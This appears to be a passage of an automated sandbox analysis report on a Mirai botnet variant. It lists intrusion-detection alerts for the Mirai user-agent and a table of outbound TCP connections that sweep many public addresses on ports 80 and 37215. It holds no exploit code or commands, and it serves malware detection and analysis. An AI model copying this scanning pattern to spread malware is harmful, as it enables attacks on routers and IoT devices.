02/25/24-19:02:19.062601	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	54734	80	192.168.2.15	95.85.27.7
02/25/24-19:03:01.017365	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42028	80	192.168.2.15	95.110.146.110
02/25/24-19:03:22.735789	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49084	80	192.168.2.15	95.251.254.209
02/25/24-19:03:07.070063	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47038	80	192.168.2.15	95.237.168.201
02/25/24-19:03:01.003981	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39074	80	192.168.2.15	95.111.255.30
02/25/24-19:03:06.878152	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49672	80	192.168.2.15	112.199.233.119
02/25/24-19:03:12.605167	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42260	80	192.168.2.15	95.205.53.195
02/25/24-19:02:23.737771	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47474	80	192.168.2.15	95.87.45.157
02/25/24-19:03:10.163520	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34586	80	192.168.2.15	88.84.135.3
02/25/24-19:02:59.438342	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55998	80	192.168.2.15	88.198.166.119
02/25/24-19:03:38.559357	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40584	80	192.168.2.15	88.208.240.26
02/25/24-19:03:02.726982	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44660	80	192.168.2.15	112.175.173.75
02/25/24-19:02:41.013982	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45688	80	192.168.2.15	88.30.7.140
02/25/24-19:03:17.526942	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50286	80	192.168.2.15	88.99.251.122
02/25/24-19:03:23.237226	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	48814	80	192.168.2.15	112.126.71.222
02/25/24-19:02:37.489008	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60378	80	192.168.2.15	112.85.242.170
02/25/24-19:02:57.393445	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45122	80	192.168.2.15	95.163.199.7
02/25/24-19:02:19.158292	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59858	80	192.168.2.15	95.56.25.22
02/25/24-19:02:28.721700	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	41874	80	192.168.2.15	112.171.60.150
02/25/24-19:03:28.345156	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51366	80	192.168.2.15	95.217.25.126
02/25/24-19:02:49.908746	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52932	80	192.168.2.15	88.138.114.161
02/25/24-19:02:54.991690	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	48906	80	192.168.2.15	95.86.127.86
02/25/24-19:02:45.199609	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35616	80	192.168.2.15	112.166.148.193
02/25/24-19:03:03.014561	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50534	80	192.168.2.15	112.165.99.56
02/25/24-19:02:36.331770	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	41554	80	192.168.2.15	95.216.172.234
02/25/24-19:02:28.847544	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55384	80	192.168.2.15	112.104.240.7
02/25/24-19:03:07.062120	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52586	80	192.168.2.15	95.142.66.161
02/25/24-19:03:05.038247	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60216	80	192.168.2.15	95.111.201.226
02/25/24-19:02:21.707509	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34728	80	192.168.2.15	95.217.108.249
02/25/24-19:02:19.237661	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34578	80	192.168.2.15	95.164.112.148
02/25/24-19:02:37.901075	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	54950	80	192.168.2.15	88.83.97.137
02/25/24-19:03:14.602549	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60852	80	192.168.2.15	112.148.112.212
02/25/24-19:02:57.496988	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	48256	80	192.168.2.15	95.183.36.188
02/25/24-19:02:54.865097	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60592	80	192.168.2.15	95.164.195.191
02/25/24-19:03:36.139232	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35918	80	192.168.2.15	95.128.144.105
02/25/24-19:03:26.179200	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49426	80	192.168.2.15	95.35.31.183
02/25/24-19:03:21.320026	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43508	80	192.168.2.15	88.221.73.155
02/25/24-19:03:34.344364	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35622	80	192.168.2.15	95.216.155.17
02/25/24-19:03:07.107197	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46856	80	192.168.2.15	95.86.108.194
02/25/24-19:02:19.082059	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59244	80	192.168.2.15	95.217.209.101
02/25/24-19:02:31.914562	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60282	80	192.168.2.15	88.221.77.43
02/25/24-19:02:40.988685	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58836	80	192.168.2.15	88.99.227.153
02/25/24-19:02:57.447520	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59818	80	192.168.2.15	95.213.252.94
02/25/24-19:02:43.102765	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42928	80	192.168.2.15	112.126.90.235
02/25/24-19:02:44.907416	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39338	80	192.168.2.15	112.160.97.21
02/25/24-19:02:52.160193	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50454	80	192.168.2.15	112.17.17.36
02/25/24-19:03:12.751460	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45828	80	192.168.2.15	88.184.23.134
02/25/24-19:02:37.490018	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60376	80	192.168.2.15	112.85.242.170
02/25/24-19:03:12.766464	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59290	80	192.168.2.15	95.128.4.104
02/25/24-19:02:28.814262	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	37478	80	192.168.2.15	112.50.249.181
02/25/24-19:03:21.134510	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59090	80	192.168.2.15	112.4.214.254
02/25/24-19:03:25.846556	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55306	80	192.168.2.15	95.100.57.42
02/25/24-19:02:57.428738	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42614	80	192.168.2.15	95.101.252.251
02/25/24-19:02:29.111084	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	48946	80	192.168.2.15	112.176.100.116
02/25/24-19:02:45.212371	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45194	80	192.168.2.15	112.222.219.210
02/25/24-19:02:49.909871	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55992	80	192.168.2.15	88.198.101.19
02/25/24-19:02:50.348356	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38658	80	192.168.2.15	112.29.212.224
02/25/24-19:03:12.988276	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45292	80	192.168.2.15	88.227.38.117
02/25/24-19:03:03.351789	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38074	80	192.168.2.15	112.95.73.153
02/25/24-19:02:29.117951	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33936	80	192.168.2.15	112.121.164.19
02/25/24-19:03:13.008734	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51244	80	192.168.2.15	88.221.30.95
02/25/24-19:03:26.143213	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59344	80	192.168.2.15	95.85.86.117
02/25/24-19:03:08.639432	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55276	80	192.168.2.15	95.79.106.197
02/25/24-19:02:54.351845	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42556	80	192.168.2.15	95.173.181.239
02/25/24-19:03:04.913936	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35992	80	192.168.2.15	95.213.226.7
02/25/24-19:02:41.077358	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34730	80	192.168.2.15	88.216.129.249
02/25/24-19:03:04.905321	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52108	80	192.168.2.15	95.101.111.40
02/25/24-19:02:31.021269	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55316	80	192.168.2.15	112.16.247.108
02/25/24-19:02:52.157543	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50456	80	192.168.2.15	112.17.17.36
02/25/24-19:02:36.432909	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59290	80	192.168.2.15	95.221.35.196
02/25/24-19:02:19.343371	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43494	80	192.168.2.15	95.165.132.141
02/25/24-19:03:07.074022	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45318	80	192.168.2.15	95.217.7.225
02/25/24-19:02:58.051286	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56212	80	192.168.2.15	95.100.231.150
02/25/24-19:03:00.522561	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56270	80	192.168.2.15	95.100.231.150
02/25/24-19:03:35.563701	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57720	80	192.168.2.15	112.48.155.162
02/25/24-19:02:42.623315	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	37932	80	192.168.2.15	95.168.180.48
02/25/24-19:03:29.875241	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59330	80	192.168.2.15	112.65.65.138
02/25/24-19:03:31.841333	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40540	80	192.168.2.15	112.186.214.117
02/25/24-19:03:04.869691	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43264	80	192.168.2.15	95.101.237.182
02/25/24-19:02:50.280123	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36248	80	192.168.2.15	88.18.29.215
02/25/24-19:02:54.321188	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	37150	80	192.168.2.15	95.217.157.9
02/25/24-19:02:42.642451	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38458	80	192.168.2.15	95.217.22.93
02/25/24-19:03:10.178366	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52500	80	192.168.2.15	88.99.85.206
02/25/24-19:03:13.642587	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56644	80	192.168.2.15	95.100.231.150
02/25/24-19:03:22.735437	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59064	80	192.168.2.15	95.217.250.44
02/25/24-19:03:12.575077	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33824	80	192.168.2.15	95.85.216.8

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 25, 2024 19:02:15.853399992 CET	6502	80	192.168.2.15	112.159.178.59
Feb 25, 2024 19:02:15.853415966 CET	6502	80	192.168.2.15	112.65.11.59
Feb 25, 2024 19:02:15.853444099 CET	6502	80	192.168.2.15	112.198.135.22
Feb 25, 2024 19:02:15.853446007 CET	6502	80	192.168.2.15	112.93.134.58
Feb 25, 2024 19:02:15.853476048 CET	6502	80	192.168.2.15	112.201.119.144
Feb 25, 2024 19:02:15.853496075 CET	6502	80	192.168.2.15	112.250.64.38
Feb 25, 2024 19:02:15.853497982 CET	6502	80	192.168.2.15	112.35.251.151
Feb 25, 2024 19:02:15.853508949 CET	6502	80	192.168.2.15	112.141.173.12
Feb 25, 2024 19:02:15.853521109 CET	6502	80	192.168.2.15	112.24.22.225
Feb 25, 2024 19:02:15.853534937 CET	6502	80	192.168.2.15	112.68.55.98
Feb 25, 2024 19:02:15.853562117 CET	6502	80	192.168.2.15	112.46.212.80
Feb 25, 2024 19:02:15.853588104 CET	6502	80	192.168.2.15	112.220.90.223
Feb 25, 2024 19:02:15.853594065 CET	6502	80	192.168.2.15	112.108.183.173
Feb 25, 2024 19:02:15.853599072 CET	6502	80	192.168.2.15	112.91.232.120
Feb 25, 2024 19:02:15.853601933 CET	6502	80	192.168.2.15	112.120.221.55
Feb 25, 2024 19:02:15.853626013 CET	6502	80	192.168.2.15	112.46.57.128
Feb 25, 2024 19:02:15.853642941 CET	6502	80	192.168.2.15	112.25.237.38
Feb 25, 2024 19:02:15.853653908 CET	6502	80	192.168.2.15	112.75.238.103
Feb 25, 2024 19:02:15.853666067 CET	6502	80	192.168.2.15	112.113.140.38
Feb 25, 2024 19:02:15.853681087 CET	6502	80	192.168.2.15	112.141.81.118
Feb 25, 2024 19:02:15.853681087 CET	6502	80	192.168.2.15	112.249.224.74
Feb 25, 2024 19:02:15.853682995 CET	6502	80	192.168.2.15	112.81.165.77
Feb 25, 2024 19:02:15.853738070 CET	6502	80	192.168.2.15	112.63.5.68
Feb 25, 2024 19:02:15.853738070 CET	6502	80	192.168.2.15	112.98.34.163
Feb 25, 2024 19:02:15.853740931 CET	6502	80	192.168.2.15	112.15.194.135
Feb 25, 2024 19:02:15.853749990 CET	6502	80	192.168.2.15	112.127.226.10
Feb 25, 2024 19:02:15.853764057 CET	6502	80	192.168.2.15	112.117.76.8
Feb 25, 2024 19:02:15.853773117 CET	6502	80	192.168.2.15	112.40.81.120
Feb 25, 2024 19:02:15.853800058 CET	6502	80	192.168.2.15	112.56.48.141
Feb 25, 2024 19:02:15.853809118 CET	6502	80	192.168.2.15	112.155.123.186
Feb 25, 2024 19:02:15.853821039 CET	6502	80	192.168.2.15	112.241.78.187
Feb 25, 2024 19:02:15.853827953 CET	6502	80	192.168.2.15	112.115.28.81
Feb 25, 2024 19:02:15.853847980 CET	6502	80	192.168.2.15	112.200.69.248
Feb 25, 2024 19:02:15.853851080 CET	6502	80	192.168.2.15	112.248.188.144
Feb 25, 2024 19:02:15.853868008 CET	6502	80	192.168.2.15	112.199.179.84
Feb 25, 2024 19:02:15.853913069 CET	6502	80	192.168.2.15	112.77.84.46
Feb 25, 2024 19:02:15.853916883 CET	6502	80	192.168.2.15	112.46.245.222
Feb 25, 2024 19:02:15.853929043 CET	6502	80	192.168.2.15	112.113.220.101
Feb 25, 2024 19:02:15.853930950 CET	6502	80	192.168.2.15	112.249.220.205
Feb 25, 2024 19:02:15.853930950 CET	6502	80	192.168.2.15	112.254.240.72
Feb 25, 2024 19:02:15.853930950 CET	6502	80	192.168.2.15	112.32.135.12
Feb 25, 2024 19:02:15.853938103 CET	6502	80	192.168.2.15	112.67.64.214
Feb 25, 2024 19:02:15.853974104 CET	6502	80	192.168.2.15	112.170.179.49
Feb 25, 2024 19:02:15.853981972 CET	6502	80	192.168.2.15	112.5.13.15
Feb 25, 2024 19:02:15.854001045 CET	6502	80	192.168.2.15	112.235.26.214
Feb 25, 2024 19:02:15.854003906 CET	6502	80	192.168.2.15	112.239.35.105
Feb 25, 2024 19:02:15.854027033 CET	6502	80	192.168.2.15	112.120.133.38
Feb 25, 2024 19:02:15.854028940 CET	6502	80	192.168.2.15	112.224.13.148
Feb 25, 2024 19:02:15.854059935 CET	6502	80	192.168.2.15	112.19.203.131
Feb 25, 2024 19:02:15.854059935 CET	6502	80	192.168.2.15	112.82.244.221
Feb 25, 2024 19:02:15.854072094 CET	6502	80	192.168.2.15	112.58.6.77
Feb 25, 2024 19:02:15.854082108 CET	6502	80	192.168.2.15	112.49.185.32
Feb 25, 2024 19:02:15.854091883 CET	6502	80	192.168.2.15	112.215.112.251
Feb 25, 2024 19:02:15.854111910 CET	6502	80	192.168.2.15	112.25.8.122
Feb 25, 2024 19:02:15.854125023 CET	6502	80	192.168.2.15	112.24.149.99
Feb 25, 2024 19:02:15.854140997 CET	6502	80	192.168.2.15	112.235.209.63
Feb 25, 2024 19:02:15.854146004 CET	6502	80	192.168.2.15	112.28.209.207
Feb 25, 2024 19:02:15.854161978 CET	6502	80	192.168.2.15	112.58.202.0
Feb 25, 2024 19:02:15.854167938 CET	6502	80	192.168.2.15	112.50.193.9
Feb 25, 2024 19:02:15.854181051 CET	6502	80	192.168.2.15	112.122.100.125
Feb 25, 2024 19:02:15.854181051 CET	6502	80	192.168.2.15	112.94.2.149
Feb 25, 2024 19:02:15.854198933 CET	6502	80	192.168.2.15	112.229.44.151
Feb 25, 2024 19:02:15.854226112 CET	6502	80	192.168.2.15	112.163.186.55
Feb 25, 2024 19:02:15.854252100 CET	6502	80	192.168.2.15	112.0.34.20
Feb 25, 2024 19:02:15.854252100 CET	6502	80	192.168.2.15	112.178.137.167
Feb 25, 2024 19:02:15.854291916 CET	6502	80	192.168.2.15	112.152.209.182
Feb 25, 2024 19:02:15.854294062 CET	6502	80	192.168.2.15	112.189.144.56
Feb 25, 2024 19:02:15.854370117 CET	6502	80	192.168.2.15	112.169.219.219
Feb 25, 2024 19:02:15.854377985 CET	6502	80	192.168.2.15	112.159.16.190
Feb 25, 2024 19:02:15.854388952 CET	6502	80	192.168.2.15	112.118.159.70
Feb 25, 2024 19:02:15.854412079 CET	6502	80	192.168.2.15	112.78.10.155
Feb 25, 2024 19:02:15.854420900 CET	6502	80	192.168.2.15	112.208.27.97
Feb 25, 2024 19:02:15.854428053 CET	6502	80	192.168.2.15	112.219.141.154
Feb 25, 2024 19:02:15.854453087 CET	6502	80	192.168.2.15	112.19.223.15
Feb 25, 2024 19:02:15.854454994 CET	6502	80	192.168.2.15	112.109.189.53
Feb 25, 2024 19:02:15.854466915 CET	6502	80	192.168.2.15	112.166.42.129
Feb 25, 2024 19:02:15.854484081 CET	6502	80	192.168.2.15	112.246.4.109
Feb 25, 2024 19:02:15.854485989 CET	6502	80	192.168.2.15	112.206.23.8
Feb 25, 2024 19:02:15.854501009 CET	6502	80	192.168.2.15	112.66.175.171
Feb 25, 2024 19:02:15.854523897 CET	6502	80	192.168.2.15	112.30.228.91
Feb 25, 2024 19:02:15.854549885 CET	6502	80	192.168.2.15	112.225.196.164
Feb 25, 2024 19:02:15.854559898 CET	6502	80	192.168.2.15	112.40.61.30
Feb 25, 2024 19:02:15.854563951 CET	6502	80	192.168.2.15	112.102.36.106
Feb 25, 2024 19:02:15.854582071 CET	6502	80	192.168.2.15	112.192.101.6
Feb 25, 2024 19:02:15.854585886 CET	6502	80	192.168.2.15	112.77.82.1
Feb 25, 2024 19:02:15.854594946 CET	6502	80	192.168.2.15	112.155.169.231
Feb 25, 2024 19:02:15.854618073 CET	6502	80	192.168.2.15	112.79.77.82
Feb 25, 2024 19:02:15.854629040 CET	6502	80	192.168.2.15	112.143.36.58
Feb 25, 2024 19:02:15.854641914 CET	6502	80	192.168.2.15	112.160.73.146
Feb 25, 2024 19:02:15.854657888 CET	6502	80	192.168.2.15	112.225.187.121
Feb 25, 2024 19:02:15.854670048 CET	6502	80	192.168.2.15	112.128.107.21
Feb 25, 2024 19:02:15.854681015 CET	6502	80	192.168.2.15	112.180.108.84
Feb 25, 2024 19:02:15.854690075 CET	6502	80	192.168.2.15	112.183.213.34
Feb 25, 2024 19:02:15.854701042 CET	6502	80	192.168.2.15	112.226.169.48
Feb 25, 2024 19:02:15.854728937 CET	6502	80	192.168.2.15	112.116.71.239
Feb 25, 2024 19:02:15.854737043 CET	6502	80	192.168.2.15	112.229.67.76
Feb 25, 2024 19:02:15.854751110 CET	6502	80	192.168.2.15	112.58.213.201
Feb 25, 2024 19:02:15.854762077 CET	6502	80	192.168.2.15	112.148.39.1
Feb 25, 2024 19:02:15.854773998 CET	6502	80	192.168.2.15	112.250.26.71
Feb 25, 2024 19:02:15.854793072 CET	6502	80	192.168.2.15	112.122.226.150
Feb 25, 2024 19:02:15.854794025 CET	6502	80	192.168.2.15	112.90.80.204
Feb 25, 2024 19:02:15.854823112 CET	6502	80	192.168.2.15	112.91.2.6
Feb 25, 2024 19:02:15.854835987 CET	6502	80	192.168.2.15	112.7.119.30
Feb 25, 2024 19:02:15.854844093 CET	6502	80	192.168.2.15	112.123.127.23
Feb 25, 2024 19:02:15.854844093 CET	6502	80	192.168.2.15	112.159.35.252
Feb 25, 2024 19:02:15.854875088 CET	6502	80	192.168.2.15	112.148.19.5
Feb 25, 2024 19:02:15.854899883 CET	6502	80	192.168.2.15	112.110.120.225
Feb 25, 2024 19:02:15.854899883 CET	6502	80	192.168.2.15	112.58.87.213
Feb 25, 2024 19:02:15.854907036 CET	6502	80	192.168.2.15	112.12.163.92
Feb 25, 2024 19:02:15.854918003 CET	6502	80	192.168.2.15	112.98.173.34
Feb 25, 2024 19:02:15.854937077 CET	6502	80	192.168.2.15	112.161.187.139
Feb 25, 2024 19:02:15.854943991 CET	6502	80	192.168.2.15	112.217.163.149
Feb 25, 2024 19:02:15.854955912 CET	6502	80	192.168.2.15	112.99.233.238
Feb 25, 2024 19:02:15.854986906 CET	6502	80	192.168.2.15	112.31.21.38
Feb 25, 2024 19:02:15.854989052 CET	6502	80	192.168.2.15	112.227.99.114
Feb 25, 2024 19:02:15.855007887 CET	6502	80	192.168.2.15	112.102.207.15
Feb 25, 2024 19:02:15.855010033 CET	6502	80	192.168.2.15	112.43.48.173
Feb 25, 2024 19:02:15.855024099 CET	6502	80	192.168.2.15	112.25.135.92
Feb 25, 2024 19:02:15.855026960 CET	6502	80	192.168.2.15	112.90.239.209
Feb 25, 2024 19:02:15.855040073 CET	6502	80	192.168.2.15	112.180.140.196
Feb 25, 2024 19:02:15.855062008 CET	6502	80	192.168.2.15	112.149.129.229
Feb 25, 2024 19:02:15.855081081 CET	6502	80	192.168.2.15	112.146.68.222
Feb 25, 2024 19:02:15.855082989 CET	6502	80	192.168.2.15	112.217.252.221
Feb 25, 2024 19:02:15.855091095 CET	6502	80	192.168.2.15	112.62.6.57
Feb 25, 2024 19:02:15.855098009 CET	6502	80	192.168.2.15	112.17.122.218
Feb 25, 2024 19:02:15.855108976 CET	6502	80	192.168.2.15	112.49.235.93
Feb 25, 2024 19:02:15.855351925 CET	6502	80	192.168.2.15	112.225.47.9
Feb 25, 2024 19:02:15.855362892 CET	6502	80	192.168.2.15	112.28.123.221
Feb 25, 2024 19:02:15.855390072 CET	6502	80	192.168.2.15	112.113.90.21
Feb 25, 2024 19:02:15.855422020 CET	6502	80	192.168.2.15	112.102.72.236
Feb 25, 2024 19:02:15.855422974 CET	6502	80	192.168.2.15	112.243.74.30
Feb 25, 2024 19:02:15.855453968 CET	6502	80	192.168.2.15	112.168.7.152
Feb 25, 2024 19:02:15.855453968 CET	6502	80	192.168.2.15	112.81.8.52
Feb 25, 2024 19:02:15.855478048 CET	6502	80	192.168.2.15	112.133.12.10
Feb 25, 2024 19:02:15.855479002 CET	6502	80	192.168.2.15	112.100.53.168
Feb 25, 2024 19:02:15.855492115 CET	6502	80	192.168.2.15	112.19.247.20
Feb 25, 2024 19:02:15.855513096 CET	6502	80	192.168.2.15	112.29.210.201
Feb 25, 2024 19:02:15.855532885 CET	6502	80	192.168.2.15	112.109.217.96
Feb 25, 2024 19:02:15.855556011 CET	6502	80	192.168.2.15	112.241.103.60
Feb 25, 2024 19:02:15.855560064 CET	6502	80	192.168.2.15	112.171.24.240
Feb 25, 2024 19:02:15.855576038 CET	6502	80	192.168.2.15	112.2.200.208
Feb 25, 2024 19:02:15.855591059 CET	6502	80	192.168.2.15	112.72.3.36
Feb 25, 2024 19:02:15.855604887 CET	6502	80	192.168.2.15	112.30.40.107
Feb 25, 2024 19:02:15.855622053 CET	6502	80	192.168.2.15	112.236.139.239
Feb 25, 2024 19:02:15.855628967 CET	6502	80	192.168.2.15	112.120.70.122
Feb 25, 2024 19:02:15.855638981 CET	6502	80	192.168.2.15	112.164.107.142
Feb 25, 2024 19:02:15.855662107 CET	6502	80	192.168.2.15	112.204.255.6
Feb 25, 2024 19:02:15.855673075 CET	6502	80	192.168.2.15	112.47.159.237
Feb 25, 2024 19:02:15.855673075 CET	6502	80	192.168.2.15	112.95.26.198
Feb 25, 2024 19:02:15.855694056 CET	6502	80	192.168.2.15	112.237.208.32
Feb 25, 2024 19:02:15.855701923 CET	6502	80	192.168.2.15	112.95.213.193
Feb 25, 2024 19:02:15.855711937 CET	6502	80	192.168.2.15	112.23.189.161
Feb 25, 2024 19:02:15.855746984 CET	6502	80	192.168.2.15	112.109.244.49
Feb 25, 2024 19:02:15.855747938 CET	6502	80	192.168.2.15	112.18.50.97
Feb 25, 2024 19:02:15.855757952 CET	6502	80	192.168.2.15	112.228.137.50
Feb 25, 2024 19:02:15.855768919 CET	6502	80	192.168.2.15	112.244.84.51
Feb 25, 2024 19:02:15.855788946 CET	6502	80	192.168.2.15	112.253.84.228
Feb 25, 2024 19:02:15.855796099 CET	6502	80	192.168.2.15	112.86.237.44
Feb 25, 2024 19:02:15.855798006 CET	6502	80	192.168.2.15	112.9.12.27
Feb 25, 2024 19:02:15.855827093 CET	6502	80	192.168.2.15	112.108.109.147
Feb 25, 2024 19:02:15.857388020 CET	6246	37215	192.168.2.15	41.151.178.59
Feb 25, 2024 19:02:15.857402086 CET	6246	37215	192.168.2.15	41.73.11.59
Feb 25, 2024 19:02:15.857445955 CET	6246	37215	192.168.2.15	41.90.226.91
Feb 25, 2024 19:02:15.857454062 CET	6246	37215	192.168.2.15	41.230.169.184
Feb 25, 2024 19:02:15.857465982 CET	6246	37215	192.168.2.15	41.149.74.217
Feb 25, 2024 19:02:15.857469082 CET	6246	37215	192.168.2.15	41.224.0.52
Feb 25, 2024 19:02:15.857516050 CET	6246	37215	192.168.2.15	41.227.123.149
Feb 25, 2024 19:02:15.857527971 CET	6246	37215	192.168.2.15	41.133.237.12
Feb 25, 2024 19:02:15.857826948 CET	6246	37215	192.168.2.15	41.140.119.98
Feb 25, 2024 19:02:15.857836008 CET	6246	37215	192.168.2.15	41.138.80.229
Feb 25, 2024 19:02:15.857840061 CET	6246	37215	192.168.2.15	41.246.176.102
Feb 25, 2024 19:02:15.857872009 CET	6246	37215	192.168.2.15	41.226.153.49
Feb 25, 2024 19:02:15.857873917 CET	6246	37215	192.168.2.15	41.223.6.72
Feb 25, 2024 19:02:15.857882977 CET	6246	37215	192.168.2.15	41.169.110.237
Feb 25, 2024 19:02:15.857897997 CET	6246	37215	192.168.2.15	41.211.127.39
Feb 25, 2024 19:02:15.857909918 CET	6246	37215	192.168.2.15	41.163.193.83
Feb 25, 2024 19:02:15.857959032 CET	6246	37215	192.168.2.15	41.25.206.60
Feb 25, 2024 19:02:15.857961893 CET	6246	37215	192.168.2.15	41.231.161.48
Feb 25, 2024 19:02:15.857976913 CET	6246	37215	192.168.2.15	41.179.201.6
Feb 25, 2024 19:02:15.857989073 CET	6246	37215	192.168.2.15	41.16.47.53
Feb 25, 2024 19:02:15.858042955 CET	6246	37215	192.168.2.15	41.214.222.6
Feb 25, 2024 19:02:15.858042955 CET	6246	37215	192.168.2.15	41.138.122.31
Feb 25, 2024 19:02:15.858042955 CET	6246	37215	192.168.2.15	41.118.19.37
Feb 25, 2024 19:02:15.858047962 CET	6246	37215	192.168.2.15	41.231.2.0
Feb 25, 2024 19:02:15.858079910 CET	6246	37215	192.168.2.15	41.127.57.32
Feb 25, 2024 19:02:15.858088970 CET	6246	37215	192.168.2.15	41.84.102.64
Feb 25, 2024 19:02:15.858155966 CET	6246	37215	192.168.2.15	41.59.23.171
Feb 25, 2024 19:02:15.858170986 CET	6246	37215	192.168.2.15	41.142.81.224
Feb 25, 2024 19:02:15.858186007 CET	6246	37215	192.168.2.15	41.234.54.222
Feb 25, 2024 19:02:15.858295918 CET	6246	37215	192.168.2.15	41.175.158.245
Feb 25, 2024 19:02:15.858306885 CET	6246	37215	192.168.2.15	41.162.79.31
Feb 25, 2024 19:02:15.858310938 CET	6246	37215	192.168.2.15	41.213.105.138
Feb 25, 2024 19:02:15.858338118 CET	6246	37215	192.168.2.15	41.118.41.250
Feb 25, 2024 19:02:15.858339071 CET	6246	37215	192.168.2.15	41.37.153.115
Feb 25, 2024 19:02:15.858345985 CET	6246	37215	192.168.2.15	41.230.250.207
Feb 25, 2024 19:02:15.858375072 CET	6246	37215	192.168.2.15	41.145.17.215
